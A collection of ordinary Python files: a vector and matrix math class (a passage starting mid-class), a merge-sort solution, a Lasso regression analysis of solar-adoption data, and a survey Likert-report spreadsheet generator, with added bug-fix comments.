            self.x = x[0]
            self.y = x[1]
            self.z = x[2]
            if len(x) == 4: self.w = x[3]
    def __repr__( self ):
        if self._is4Vec: return str(( self.x, self.y, self.z, self.w ))
        return str(( self.x, self.y, self.z ))
    def __str__( self ):
        return str(repr(self))
    def __add__( self, other ):
        '''Component-wise addition (includes w for 4-vectors).'''
        if self._is4Vec: return self.__class__( self.x+other.x, self.y+other.y, self.z+other.z, self.w+other.w )
        else: return self.__class__( self.x+other.x, self.y+other.y, self.z+other.z )
    def __sub__( self, other ):
        return self + -other
    def __mul__( self, factor ):
        '''vector*vector -> dot product; vector*matrix -> transformed
        vector; vector*scalar -> component-wise scale.'''
        if isinstance(factor,Vector):
            return self.dot(factor)
        elif isinstance(factor,Matrix):
            new = self.__class__()
            size = self.size
            for i in range(size):
                element = 0
                col = factor.getCol(i)
                for j in range(size):
                    element += self[j]*col[j]
                new[i] = element
            return new
        else:
            if self._is4Vec: return self.__class__( self.x*factor, self.y*factor, self.z*factor, self.w*factor )
            else: return self.__class__( self.x*factor, self.y*factor, self.z*factor )
    def __truediv__( self, denominator ):
        if self._is4Vec: return self.__class__( self.x/denominator, self.y/denominator, self.z/denominator, self.w/denominator )
        return self.__class__( self.x/denominator, self.y/denominator, self.z/denominator )
    # BUGFIX: only __div__ was defined, which python 3 never calls
    __div__ = __truediv__
    def __invert__( self ):
        return -self
    def __neg__( self ):
        return self*-1
    def __getitem__( self, item ):
        # BUGFIX: clamp to the last *valid* index (size-1).  Clamping to
        # ``size`` let index 3 of a 3-vector return the unused w (None).
        item = min( max( item, 0 ), self.size - 1 )
        return (self.x,self.y,self.z,self.w)[item]
    def __setitem__( self, item, value ):
        # BUGFIX: same off-by-one clamp as __getitem__
        item = min( max( item, 0 ), self.size - 1 )
        setattr( self, ('x','y','z','w')[item], value )
    @classmethod
    def Zero( cls, size=4 ):
        '''Return a zero vector with *size* components.'''
        return cls( *((0,)*size) )
    @classmethod
    def Random( cls, size=4 ):
        '''Return a vector of *size* uniform random components in [0, 1).'''
        import random
        components = []  # renamed: don't shadow the builtin ``list``
        for n in range(size):
            components.append( random.random() )
        return cls( *components )
    def copy( self ):
        return self.__class__( *self.as_tuple() )
    def dot( self, other ):
        '''Return the dot product (includes w for 4-vectors).'''
        dot = self.x*other.x + self.y*other.y + self.z*other.z
        if self._is4Vec: dot += self.w*other.w
        return dot
    def __xor__( self, other ):
        '''Cross product, called using a^b.
        BUGFIX: this was previously bound to __rxor__ only, so ``a^b``
        dispatched to ``b.__rxor__(a)`` and produced the reversed product
        b x a (the comment even claimed it was invoked via ``a**b``).
        NOTE: the cross product isn't defined for a 4 vector - so it
        always ignores the w component.'''
        x = self.y*other.z - self.z*other.y
        y = self.z*other.x - self.x*other.z
        z = self.x*other.y - self.y*other.x
        return self.__class__(x,y,z)
    cross = __xor__
    def __is4Vec( self ):
        if self.w is not None: return True
        return False
    _is4Vec = property(__is4Vec)
    def get_size( self ):
        if self.w is not None: return 4
        return 3
    size = property(get_size)
    def get_magnitude( self ):
        if self._is4Vec: return math.sqrt(self.x**2 + self.y**2 + self.z**2 + self.w**2)
        return math.sqrt(self.x**2 + self.y**2 + self.z**2)
    def set_magnitude( self, factor ):
        '''Scale the vector in place so its magnitude becomes *factor*.'''
        factor /= self.length
        self.x *= factor
        self.y *= factor
        self.z *= factor
        if self._is4Vec: self.w *= factor
    magnitude = property(get_magnitude,set_magnitude)
    mag = property(get_magnitude,set_magnitude)
    length = property(get_magnitude,set_magnitude)
    def normalize( self ):
        '''normalizes the vector in place'''
        mag = self.length  # renamed: don't shadow the builtin ``len``
        self.x /= mag
        self.y /= mag
        self.z /= mag
        if self._is4Vec: self.w /= mag
    def as_tuple( self ):
        if self._is4Vec: return (self.x,self.y,self.z,self.w)
        return (self.x,self.y,self.z)
    def as_list( self ):
        return list( self.as_tuple() )
    def change_space( self, basisX, basisY, basisZ=None ):
        '''will re-parameterize this vector to a different space
        NOTE: the basisZ is optional - if not given, then it will be computed from X and Y
        NOTE: changing space isn't supported for 4-vectors'''
        if basisZ is None:
            # with the fixed ^ operator this is now the right-handed X x Y
            basisZ = basisX ^ basisY
            basisZ.normalize()
        newX = self.dot(basisX)
        newY = self.dot(basisY)
        newZ = self.dot(basisZ)
        self.x,self.y,self.z = newX,newY,newZ
        self.w = None
    def complex(self):
        '''Return a copy with every component converted to complex.'''
        return self.__class__( [ complex(v) for v in self.as_tuple() ] )
    def conjugate(self):
        '''Return the complex conjugate of this vector.'''
        return self.__class__( [ v.conjugate() for v in self.complex().as_tuple() ] )
class Matrix(object):
    '''deals with square matricies

    Stored as ``self.rows`` - a list of ``size`` row lists.  Constructor
    values fill the matrix row-major; unfilled cells keep their identity
    values.
    '''
    #__slots__ = ('size','rows') #slots are commented out because they seem to be slightly slower than the standard __dict__ attributes
    def __init__( self, values=(), size=4 ):
        if len(values) > size*size:
            raise MatrixException('too many args: the size of the matrix is %d and %d values were given'%(size,len(values)))
        self.size = size
        self.rows = []
        for n in range(size):
            row = [0]*size
            row[n] = 1
            self.rows.append(row)
        for n in range(len(values)):
            # BUGFIX: floor division - ``n/size`` is a float under python 3
            self.rows[n//size][n%size] = values[n]
    def __repr__( self ):
        asStr = ''
        for i in range(self.size):
            asStr += str( self[i] ) +'\n'
        return asStr
    def __str__( self ):
        return self.__repr__()
    def __add__( self, other ):
        new = self.__class__.Zero(self.size)
        for i in range(self.size):
            for j in range(self.size):
                new[i][j] = self[i][j] + other[i][j]
        return new
    def __sub__( self, other ):
        return self + (other*-1)
    def __mul__( self, other ):
        '''matrix*scalar, matrix*vector and matrix*matrix products'''
        new = None
        if isinstance( other, (float,int) ):
            new = self.__class__.Zero(self.size)
            for i in range(self.size):
                for j in range(self.size):
                    new[i][j] = self[i][j] * other
        elif isinstance( other, Vector ):
            new = Vector()
            for i in range(self.size):
                #vector indicies
                for j in range(4):
                    #matrix indicies
                    new[i] += other[j] * self[i][j]
        else:
            new = self.__class__.Zero(self.size)
            for i in range(self.size):
                for j in range(self.size):
                    new[i][j] = Vector( *self.getRow(i) ) * Vector( *other.getCol(j) )
        return new
    def __truediv__( self, other ):
        return self.__mul__(1.0/other)
    # BUGFIX: only __div__ existed; python 3 needs __truediv__ (inverse()
    # relies on ``new /= det``)
    __div__ = __truediv__
    def __getitem__( self, item ):
        '''matrix is indexed as: self[row][column]'''
        return self.rows[item]
    def __setitem__( self, item, newRow ):
        if len(newRow) != self.size: raise MatrixException( 'row length not of correct size' )
        self.rows[item] = newRow
    def __eq__( self, other ):
        return self.isEqual(other)
    def __ne__( self, other ):
        return not self.isEqual(other)
    def isEqual( self, other, tolerance=1e-5 ):
        '''Element-wise comparison within *tolerance*.'''
        if self.size != other.size:
            return False
        for i in range(self.size):
            for j in range(self.size):
                if abs( self[i][j] - other[i][j] ) > tolerance:
                    return False
        return True
    @classmethod
    def Zero( cls, size=4 ):
        new = cls([0]*size*size,size)
        return new
    @classmethod
    def Identity( cls, size=4 ):
        rows = [0]*size*size
        for n in range(size):
            rows[n+(n*size)] = 1
        return cls(rows,size)
    @classmethod
    def Random( cls, size=4 ):
        '''Return a matrix filled with random integers in [0, 10].'''
        rows = []
        import random
        for n in range(size*size):
            #rows.append(random.random())
            rows.append(random.randint(0,10))
        return cls(rows,size)
    def getRow( self, row ):
        return self.rows[row]
    def setRow( self, row, newRow ):
        '''Replace row *row*, truncating/padding newRow to the matrix size.
        BUGFIX: this previously assigned ``self.rows = newRow``, replacing
        the whole matrix storage with a single row list.'''
        if len(newRow) > self.size: newRow = newRow[:self.size]
        if len(newRow) < self.size:
            newRow.extend( [0] * (self.size-len(newRow)) )
        self.rows[row] = newRow
        return newRow
    def getCol( self, col ):
        column = [0]*self.size
        for n in range(self.size):
            column[n] = self.rows[n][col]
        return column
    def setCol( self, col, newCol ):
        '''Replace column *col*.
        BUGFIX: this previously did ``self.rows[n] = newCol[n]``, clobbering
        entire rows instead of the single column entry.'''
        newColActual = []
        for n in range(min(self.size,len(newCol))):
            self.rows[n][col] = newCol[n]
            newColActual.append(newCol[n])
        return newColActual
    def swapRow( self, nRowA, nRowB ):
        rowA = self.getRow(nRowA)
        rowB = self.getRow(nRowB)
        self.setRow(nRowA,rowB)
        self.setRow(nRowB,rowA)
    def swapCol( self, nColA, nColB ):
        colA = self.getCol(nColA)
        colB = self.getCol(nColB)
        self.setCol(nColA,colB)
        self.setCol(nColB,colA)
    def transpose( self ):
        new = self.__class__.Zero(self.size)
        for i in range(self.size):
            for j in range(self.size):
                new[i][j] = self[j][i]
        return new
    def transpose3by3( self ):
        '''Transpose only the upper-left 3x3 sub-matrix.'''
        new = self.copy()
        for i in range(3):
            for j in range(3):
                new[i][j] = self[j][i]
        return new
    def copy( self ):
        rows = []
        for n in range(self.size):
            rows += self[n]
        return self.__class__( rows, self.size )
    def det( self ):
        '''calculates the determinant for an arbitrarily sized square matrix
        (cofactor expansion along the first column; 0x0 determinant is 1)'''
        d = 0
        if self.size <= 0: return 1
        for i in range(self.size):
            sign = (1,-1)[ i % 2 ]
            cofactor = self.cofactor(i,0)
            d += sign * self[i][0] * cofactor.det()
        return d
    determinant = det
    def cofactor( self, aI, aJ ):
        '''Return the (size-1) minor matrix with row aI and column aJ removed.'''
        cf = self.__class__(size=self.size-1)
        cfi = 0
        for i in range(self.size):
            if i == aI: continue
            cfj = 0
            for j in range(self.size):
                if j == aJ: continue
                cf[cfi][cfj] = self[i][j]
                cfj += 1
            cfi += 1
        return cf
    minor = cofactor
    def isSingular( self ):
        '''Return (True, 0) when near-singular, else (False, determinant).'''
        det = self.det()
        if abs(det) < 1e-6: return True,0
        return False,det
    def isRotation( self ):
        '''rotation matricies have a determinant of 1
        BUGFIX: the old test ``abs(det()) - 1 < 1e-6`` was true for ANY
        determinant smaller than about one.'''
        if abs(self.det() - 1) < 1e-6: return True
        return False
    def inverse( self ):
        '''Each element of the inverse is the determinant of its minor
        divided by the determinant of the whole
        (returns a copy of self when the matrix is singular)'''
        isSingular,det = self.isSingular()
        if isSingular: return self.copy()
        new = self.__class__.Zero(self.size)
        for i in range(self.size):
            for j in range(self.size):
                sign = (1,-1)[ (i+j) % 2 ]
                new[i][j] = sign * self.cofactor(i,j).det()
        new /= det
        return new.transpose()
    def as_list( self ):
        flat = []  # renamed: don't shadow the builtin ``list``
        for i in range(self.size):
            flat.extend(self[i])
        return flat
    def as_tuple( self ):
        return tuple( self.as_list() )
def test():
    '''Sanity-check Matrix.inverse on random matrices of several sizes.'''
    #create some random matricies and make sure things are working
    import time
    # BUGFIX: time.clock() was removed in python 3.8 - use perf_counter
    start = time.perf_counter()
    def inverseTest( size, numIts=10 ):
        identity = Matrix.Identity(size)
        for n in range(numIts):
            testMatA = Matrix.Random(size)
            testMatAInv = testMatA.inverse()
            mult = testMatA*testMatAInv
            if not mult.isEqual(identity,0.001):
                assert isinstance(mult,Matrix)
                # BUGFIX: isSingular() returns a (bool, det) tuple, which is
                # always truthy - test the boolean flag itself
                if not mult.isSingular()[0]:
                    print('failed to calculate inverse for matrix of size %d' % size)
                    print(mult)
    inverseTest(2)
    inverseTest(3)
    inverseTest(4,250)
    #for n in range(20000):
        #a=Matrix.Random()
        #b=a.as_tuple()
        #len(b)
    secs = time.perf_counter() - start
    print('seconds taken %s' % secs)
#test()
#end |
class Solution:
    def sortColors(self, nums: 'List[int]') -> None:
        """Sort ``nums`` in place using recursive merge sort.

        Algorithm : merge-sort (divide and conquer)
        BUGFIX: the annotation is quoted because ``List`` is never
        imported; an unquoted ``List[int]`` raises NameError the moment
        the method is defined.
        """
        if len(nums) > 1:
            mid = len(nums) // 2
            left = nums[:mid]
            right = nums[mid:]
            # sort each half independently
            self.sortColors(left)
            self.sortColors(right)
            # merge the two sorted halves back into nums
            i = j = k = 0
            while i < len(left) and j < len(right):
                if left[i] < right[j]:
                    nums[k] = left[i]
                    i += 1
                else:
                    nums[k] = right[j]
                    j += 1
                k += 1
            # drain whichever half still has elements
            while i < len(left):
                nums[k] = left[i]
                i += 1
                k += 1
            while j < len(right):
                nums[k] = right[j]
                j += 1
                k += 1
# driver code
nums = [2,0,2,1,1,0]
# expected output: [0,0,1,1,2,2]
if __name__ == "__main__":
    myObj = Solution()
    # BUGFIX: sortColors requires the list to sort; it was called with no argument
    myObj.sortColors(nums)
    print(nums)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Mar 1 12:42:31 2019
@author: rebeccafang
"""
""" This program applies a linear regression model with L1 regularization to
the cleaned DeepSolar dataset. This model predicts residential solar system
count per 1000 households.
"""
import matplotlib.pyplot as plt
import math
import numpy as np
import pandas as pd
import seaborn as sns
import sklearn
from sklearn import linear_model
from sklearn.feature_selection import f_regression
from sklearn.metrics import mean_squared_error, r2_score, mean_absolute_error
from sklearn import preprocessing
import sys
# Columns not used by the model: leftover index columns from earlier CSV
# saves, raw demographic counts, education breakdowns, and poverty/housing
# totals.  The same list is dropped from every split.
_UNUSED_COLUMNS = ['Unnamed: 0','Unnamed: 0.1',
    'race_asian','race_black_africa','race_indian_alaska','race_islander','race_other','race_two_more','race_white','total_area','unemployed','water_area','population','land_area','employed',
    'education_bachelor','education_college','education_doctoral','education_high_school_graduate','education_less_than_high_school','education_master','education_population','education_professional_school',
    'poverty_family_below_poverty_level','poverty_family_count','household_count','housing_unit_count','housing_unit_occupied_count','electricity_consume_residential']

def _load_split(path):
    '''Read one dataset split from CSV and drop the unused columns.'''
    df = pd.read_csv(path, delimiter=',')
    df.drop(_UNUSED_COLUMNS, axis=1, inplace=True)
    return df

# The identical load-and-drop sequence was previously copy-pasted three times.
training_set_raw = _load_split('solar_training_set.csv')
val_set_raw = _load_split('solar_val_set.csv')
test_set_raw = _load_split('solar_test_set.csv')
# Target variable: residential solar systems per 1,000 households
y_train_raw = training_set_raw['number_solar_system_per_1000_household']
# Quick summary statistics of the raw (unscaled) target
print('y_train', y_train_raw[:10])
print('mean',np.mean(y_train_raw))
print('std dev',np.std(y_train_raw))
print('variance',np.var(y_train_raw))
print('min value',np.min(y_train_raw))
print('max value',np.max(y_train_raw))
# Plot distribution of y_train values (number of solar systems per 1,000 households)
plt.hist(y_train_raw,500)
plt.xlim(0, 600)
plt.yscale('log')  # counts span orders of magnitude; log y-axis keeps the tail visible
plt.xlabel('Number of Solar Systems per 1,000 Households')
plt.ylabel('Number of Data Examples')
plt.title('Distribution of Training Data')
#plt.savefig('training_data_hist.eps', format='eps', dpi=1000)
plt.show()
# Data preprocessing: label-encode text (object dtype) columns so the
# regression model receives purely numeric input.
le = preprocessing.LabelEncoder()

def _encode_object_columns(df):
    '''Label-encode every object-dtype column of *df* in place.

    NOTE(review): the encoder is refit for each column and each split, so
    the same category may map to different codes in train/val/test -
    confirm this is acceptable for the features involved.
    '''
    for column_name in df.columns:
        if df[column_name].dtype == object:
            df[column_name] = le.fit_transform(df[column_name])

# The identical encoding loop was previously copy-pasted for each split.
_encode_object_columns(training_set_raw)
_encode_object_columns(val_set_raw)
_encode_object_columns(test_set_raw)
# Normalize data: scale every column to [0, 1]
training_set = training_set_raw.values
min_max_scaler = preprocessing.MinMaxScaler()
training_set = min_max_scaler.fit_transform(training_set)
training_set = pd.DataFrame(training_set, columns = training_set_raw.columns)
val_set = val_set_raw.values
# NOTE(review): fit_transform REFITS the scaler on the validation/test sets
# instead of reusing the training-set fit via transform() - each split is
# scaled by its own min/max.  Confirm whether this is intentional.
val_set = min_max_scaler.fit_transform(val_set)
val_set = pd.DataFrame(val_set, columns = val_set_raw.columns)
test_set = test_set_raw.values
test_set = min_max_scaler.fit_transform(test_set)
test_set = pd.DataFrame(test_set, columns = test_set_raw.columns)
# Split each set into features X and target y
y_train = training_set[['number_solar_system_per_1000_household']]
training_set.drop('number_solar_system_per_1000_household', axis=1, inplace=True) # Remove y column
X_train = training_set
y_val = val_set[['number_solar_system_per_1000_household']]
val_set.drop('number_solar_system_per_1000_household', axis=1, inplace=True) # Remove y column
X_val = val_set
y_test = test_set[['number_solar_system_per_1000_household']]
test_set.drop('number_solar_system_per_1000_household', axis=1, inplace=True) # Remove y column
X_test = test_set
# Sweep candidate L1 strengths and keep the alpha with the lowest
# validation-set mean absolute error.
alpha_lst = [1e-5, 1e-4, 1e-3, 1e-2, 1e-1, 1, 10, 100]
mae_lst = [] # List of mean absolute errors for the alphas
coefs_lst = [] # List of coefficients arrays for alpha values
loss_lst = [] # List of loss values for alpha values
for a in alpha_lst:
    mod = linear_model.Lasso(alpha = a, fit_intercept=True, max_iter=20000)
    mod.fit(X_train, y_train)
    y_pred_temp = mod.predict(X_val) # Predict residential solar system density on validation set
    y_val_temp = y_val.values # Convert dataframe to numpy array
    y_pred_temp = np.expand_dims(y_pred_temp,1) # Expand dimensions to match y_val
    mae_temp = mean_absolute_error(y_val_temp, y_pred_temp)
    mae_lst.append(mae_temp)
    loss_temp = mae_temp * len(y_val_temp)  # total absolute error (MAE * n)
    loss_lst.append(loss_temp)
    coefs_lst.append(mod.coef_)
# Find alpha that gives lowest mae
alph = alpha_lst[mae_lst.index(min(mae_lst))]
# Create and train linear regression model with L1 regularization on training set
model = linear_model.Lasso(alpha = alph, fit_intercept=True, max_iter=20000)
model.fit(X_train, y_train)
y_pred = model.predict(X_val) # Predict residential solar system density on validation set
y_val = y_val.values # Convert dataframe to numpy array
y_pred = np.expand_dims(y_pred,1) # Expand dimensions to match y_val
# Training-set prefixes for the learning curves: every 2000 examples up to
# 42000, plus the full training set.  (Replaces two hand-written 22-element
# slice lists that were identical in content but unreadable.)
_subset_sizes = list(range(2000, 44000, 2000))
X_train_lst = [X_train[0:n] for n in _subset_sizes] + [X_train]
y_train_lst = [y_train[0:n] for n in _subset_sizes] + [y_train]
J_train_lst = []
J_val_lst = []
# Loop over various training set sizes
for i in range(0,len(X_train_lst)):
    X_learn = X_train_lst[i]
    y_learn = y_train_lst[i]
    mod_learn = linear_model.Lasso(alpha = alph, fit_intercept=True, max_iter=20000)
    mod_learn.fit(X_learn, y_learn)
    y_pred_val = mod_learn.predict(X_val)
    y_pred_val = np.expand_dims(y_pred_val,1)
    mae_val = mean_absolute_error(y_val, y_pred_val)
    mse_val = mean_squared_error(y_val, y_pred_val)
    J_val = mae_val * len(y_val) # Validation error
    # NOTE(review): the mean absolute error is appended, not the summed
    # loss J_val computed above - confirm which one the plot should show.
    J_val_lst.append(mae_val)
    y_pred_train = mod_learn.predict(X_learn)
    y_pred_train = np.expand_dims(y_pred_train,1)
    mae_train = mean_absolute_error(y_learn, y_pred_train)
    mse_train = mean_squared_error(y_learn, y_pred_train)
    J_train = mae_train * len(y_learn) # Training error
    J_train_lst.append(mae_train)
# Identify which features L1 regularization zeroed out, and rank the
# surviving features by coefficient magnitude.
headers = np.array(X_train.columns.values)  # column header names
coefs = model.coef_
zeros = np.where(coefs == 0)[0]
nonzeros = np.where(coefs != 0)[0]
num_nonzero = np.count_nonzero(coefs)  # number of features the model kept
zero_lst = [headers[idx] for idx in zeros]
nonzero_lst = [(headers[idx], abs(coefs[idx])) for idx in nonzeros]
# Rank nonzero-coefficient features by the absolute value of the coefficient
nonzero_lst.sort(key=lambda pair: pair[1])
# Run trained model on training set
y_pred_training = model.predict(X_train)
# Run trained model on test set
y_pred_test = model.predict(X_test)
## Print coefficients for train
#print('Coefficients: \n', model.coef_)
## Print the mean absolute error
#print('Mean absolute error: %.2f' % mean_absolute_error(y_train, y_pred_training))
## Print the mean squared error
#print('Mean squared error: %.2f' % mean_squared_error(y_train, y_pred_training))
## Print the root mean squared error
#print('Root mean squared error: %.2f' % math.sqrt(mean_squared_error(y_train, y_pred_training)))
## Print variance score, where 1 = perfect prediction
#print('Variance score: %.2f' % r2_score(y_train, y_pred_training))
# Final test-set metrics for the model (alpha chosen on the validation set)
# Print coefficients for test
print('Coefficients: \n', model.coef_)
# Print the mean absolute error
print('Mean absolute error: %.2f' % mean_absolute_error(y_test, y_pred_test))
# Print the mean squared error
print('Mean squared error: %.2f' % mean_squared_error(y_test, y_pred_test))
# Print the root mean squared error
print('Root mean squared error: %.2f' % math.sqrt(mean_squared_error(y_test, y_pred_test)))
# Print variance score, where 1 = perfect prediction
print('Variance score: %.2f' % r2_score(y_test, y_pred_test))
## Print coefficients for validation
#print('Coefficients: \n', model.coef_)
## Print the mean absolute error
#print('Mean absolute error: %.2f' % mean_absolute_error(y_val, y_pred))
## Print the mean squared error
#print('Mean squared error: %.2f' % mean_squared_error(y_val, y_pred))
## Print the root mean squared error
#print('Root mean squared error: %.2f' % math.sqrt(mean_squared_error(y_val, y_pred)))
## Print variance score, where 1 = perfect prediction
#print('Variance score: %.2f' % r2_score(y_val, y_pred))
#loss1 = np.sum(np.absolute(y_pred - y_val))
#loss2 = mae * len(y_val)
#assert loss1 - loss2 <= 0.0001
# Plot coefficients vs. alphas
plt.plot(alpha_lst, coefs_lst)
plt.xscale('log')
plt.xlabel('alpha')
plt.ylabel('Coefficients')
plt.title('Lasso coefficients as a function of the learning rate')
#plt.savefig('L1_coefs_alpha.eps', format='eps', dpi=1000)
plt.show()
# Plot loss vs. alphas
plt.plot(alpha_lst, loss_lst)
plt.xscale('log')
plt.xlabel('alpha')
plt.ylabel('Loss')
plt.title('Loss as a function of the learning rate (L1 Regularization)')
#plt.savefig('L1_loss_alpha.eps', format='eps', dpi=1000)
plt.show()
# Plot learning curves
# X axis: number of training examples used for each prefix model
X_train_num = []
for i in range(0,len(X_train_lst)):
    X_train_num.append(len(X_train_lst[i]))
plt.plot(X_train_num, J_train_lst)
plt.plot(X_train_num, J_val_lst)
plt.legend(["Training Error", "Validation Error"], loc='best')
plt.xlabel('Training examples')
plt.ylabel('Mean Absolute Error')
plt.title('Learning Curves for L1 Regularization')
#plt.savefig('L1_learning_curve.eps', format='eps', dpi=1000)
plt.show()
# Plot histogram of test error
y_test = y_test.values  # convert to numpy array to match the prediction shape
y_pred_test = np.expand_dims(y_pred_test,1)
test_error = y_test - y_pred_test
plt.hist(test_error,500)
plt.xlim(-0.1, 0.2)
plt.xlabel('Error')
plt.ylabel('Number of Test Examples')
plt.title('Histogram of Test Error (L1 Regularization)')
#plt.savefig('L1_test_error_hist.eps', format='eps', dpi=1000)
plt.show()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
import math
import pandas as pd
import numpy as np
from optparse import OptionParser
from xlsxwriter.utility import xl_rowcol_to_cell
class Report:
    '''Build XLSX Likert reports from a SurveyMonkey Excel export.

    Question columns are recognised by the word "Response" in their first
    data row.  ``report_total`` writes a company-wide "ALL" report (which
    also caches the company averages and top-box scores for comparison),
    and ``report`` writes one file per distinct value of the grouping
    column (``custom_3``).
    '''
    def __init__(self, filename):
        # company-wide reference values, filled in when the 'ALL' report runs
        self.all_top_box = None
        self.all_average = None
        # column whose values split the data into separate reports
        self.split_reports_by = u'custom_3'
        # Likert scale labels: Strongly Disagree ... Strongly Agree
        self.likert_names = ["SD", "D", "N", "A", "SA"]
        df = pd.read_excel(filename)
        self.df = self.drop_unwanted_columns(df, keep=[self.split_reports_by])
        questions, question_key_list = self.get_questions_in_order()
    def drop_unwanted_columns(self, df, keep=()):
        '''Return *df* without columns whose first row is not "Response".

        BUGFIX: the default for *keep* was a mutable list literal; an
        immutable tuple avoids the shared-default pitfall.
        '''
        # The SurveyMonkey report might have unwanted rows
        for column_name in df.columns.tolist():
            if column_name in keep:
                continue
            if df[column_name][0] != "Response":
                df = df.drop(columns=[column_name])
        return df
    def get_questions_in_order(self, key_prefix = 'F%2i'):
        '''Map short keys ('F 1', 'F 2', ...) to question column names.

        Returns ``(key -> question dict, ordered key list)`` and also
        stores both on the instance.
        '''
        # SurveyMonkey adds the key word "Response"
        ret = {}
        key_list = []
        index = 0
        for column_name in self.df.columns.tolist():
            if self.df[column_name][0] == "Response":
                index = index + 1
                ret[key_prefix % index] = column_name
                key_list.append(key_prefix % index)
        self.questions = ret
        self.question_key_list = key_list
        return ret, key_list
    def report_total(self):
        '''Generate the company-wide report over all response rows.'''
        report_name = "ALL"
        print("Processing Report: %s" % report_name)
        df = self.df.copy(deep=True)
        df = df.drop(columns=[self.split_reports_by])
        # pivot to one row per question with the answers stacked beneath it
        df = pd.DataFrame(df.stack())
        df = pd.DataFrame(df.unstack(0))
        df = df.drop(columns=[(0,0)])
        self.generate_report(df, report_name)
    def report(self):
        '''Generate one report per distinct value of the grouping column.'''
        for report_name in self.df[self.split_reports_by].unique():
            # filter garbage out
            if type(report_name) != str:
                continue
            print("Processing Report: %s" % report_name)
            df = self.df.copy(deep=True)
            df = df[df[self.split_reports_by] == report_name]
            df = df.drop(columns=[self.split_reports_by])
            df = pd.DataFrame(df.stack())
            df = pd.DataFrame(df.unstack(0))
            self.generate_report(df, report_name)
    def write_xlsx(self, df, name):
        """
        Make a shiny XLSX
        """
        # Add full question texts
        for key in self.questions:
            df.loc[key,'Q'] = self.questions[key]
        # Swap question with question-key
        col_index = ['Q', 'SD','D', 'N','A', 'SA', 'CNT', 'AVG', "CAV", "BOX", "CBO" ] #
        df = df.reindex(col_index, axis=1)
        # Human readable column names
        df = df.rename(columns={
            "SD": "-2",
            "D": "-1",
            "N": "0",
            "A": "+1",
            "SA": "+2",
            "CNT": "Anzahl:",
            "AVG": name,
            "CAV": "Company",
            "BOX": name + "Top Box",
            "CBO": "Company Top Box",
            "Q": "Frage"
        })
        # open the XLSX writer
        writer = pd.ExcelWriter(name + '.xlsx', engine='xlsxwriter')
        sheet = "Report"
        # add data frame to sheet
        df.to_excel(writer, sheet)
        # define and set number formats
        workbook = writer.book
        worksheet = writer.sheets[sheet]
        # set default cell format
        workbook.formats[0].set_font_size(10)
        workbook.formats[0].set_font_name('Arial')
        # https://xlsxwriter.readthedocs.io/format.html
        format1 = workbook.add_format({'num_format': '#,##0.00'})
        format2 = workbook.add_format({'num_format': '0%'})
        format3 = workbook.add_format({'bg_color' : '008046',
                                       'font_color': 'ffffff'})
        format4 = workbook.add_format({'bg_color' : 'F79646'})
        # vertical header row (local name was misspelled 'fromat5')
        format5 = workbook.add_format({'rotation' : 90,
                                       'bg_color' : 'F2F2F2' })
        # set column formats based on index
        worksheet.set_row (0, 20, cell_format = format5)
        worksheet.set_column(col_index.index('AVG') + 1,
                             col_index.index('CAV') + 1,
                             width = 10, cell_format = format1)
        worksheet.set_column(col_index.index('BOX') + 1,
                             col_index.index('CBO') + 1,
                             width = 10, cell_format = format2)
        # add conditional formats
        # https://xlsxwriter.readthedocs.io/working_with_conditional_formats.html
        compare_to = xl_rowcol_to_cell(1, col_index.index('CBO') + 1,
                                       col_abs = True)
        col = col_index.index('BOX') + 1
        # green when >= 15 points above the company top box, orange when
        # >= 15 points below it
        worksheet.conditional_format(1, col, 30, col,{'type': 'cell',
                                     'criteria': '>=',
                                     'value': f'{compare_to}+0.15',
                                     'format': format3
                                     })
        worksheet.conditional_format(1, col, 30, col, {'type': 'cell',
                                     'criteria': '<=',
                                     'value': f'{compare_to}-0.15',
                                     'format': format4
                                     })
        # final save
        # BUGFIX: ExcelWriter.save() is deprecated (and removed in newer
        # pandas); close() persists the file in all versions
        writer.close()
    def generate_report(self, df, name):
        '''Compute per-question counts, averages and top-box scores, then
        hand the frame to write_xlsx.'''
        # safe lookup: 0 when a Likert value never occurs for a question
        g_fnc = lambda x,y: x.loc[y] if y in x.index else 0
        columns_names = ["SD", "D", "N", "A", "SA"]
        # Count all values by column name
        for key in self.question_key_list:
            for i in range(1, len(columns_names) + 1):
                counts = g_fnc (df.loc[self.questions[key],0].value_counts(), i)
                df.loc[self.questions[key], columns_names[i-1]] = int(counts)
        # Calulate Averages and add new columns CNT and AVG
        for key in self.question_key_list:
            total = df.loc[self.questions[key],[0]].sum()
            count = df.loc[self.questions[key],["SD", "D", "N", "A", "SA"]].sum()
            df.loc[self.questions[key], "XXCNT"] = count
            df.loc[self.questions[key], "XXAVG"] = total / count
        # Delete the raw survey data
        df.drop(0, axis=1, inplace=True)
        # re-index the frame by the short question keys
        for key in self.questions:
            df.loc[self.questions[key],'ID'] = key
        df = df.set_index('ID')
        for key in self.question_key_list:
            topbox = [0, 0, 0, 1, 1]    # mask: agree / strongly agree
            botbox = [1, 1, 1, 0, 0]    # mask: everything else
            scores = [1, 2, 3, 4, 5]    # numeric Likert scores
            weights = [2, 1, 0, 1, 2]   # distance from the neutral answer
            respons = df.loc[key,columns_names]
            topvalue = (respons * topbox).sum()
            botvalue = (respons * botbox).sum()
            df.loc[key, "CNT"] = respons.sum()
            df.loc[key, "AVG"] = (respons * scores).sum() / respons.sum()
            if ((respons * weights).sum() > 0):
                df.loc[key, "AVGW"] = (respons * weights * scores).sum() / (respons * weights).sum()
            else:
                df.loc[key, "AVGW"] = 0
            df.loc[key, "BOX"] = (1 / (topvalue + botvalue) * topvalue)
        # the company-wide report caches its values for later comparison
        if name == 'ALL':
            self.all_top_box = df.loc[:,"BOX"]
            self.all_average = df.loc[:,"AVG"]
        df['CAV'] = self.all_average
        df['CBO'] = self.all_top_box
        df[columns_names] = df[["SD", "D", "N", "A", "SA"]].fillna(0.0).astype(int)
        df.columns = df.columns.droplevel(level=1)
        self.write_xlsx(df, name)
if __name__ == "__main__":
    parser = OptionParser()
    # BUGFIX: the default was the *string* "False", which is truthy, so
    # options.verbose was effectively always on - use the boolean False
    parser.add_option("-v", "--verbose",
                      action="store_true", dest="verbose", default=False,
                      help="Verbose prints enabled")
    parser.add_option("-f", "--file", dest="filename",
                      help="write report to FILE", metavar="FILE")
    (options, args) = parser.parse_args()
    # build the company-wide report first so per-group reports can compare
    # against the cached 'ALL' values
    r = Report(options.filename)
    r.report_total()
    r.report()
|
import paver
import paver.misctasks
from paver.path import path
from paver.easy import *
import paver.setuputils
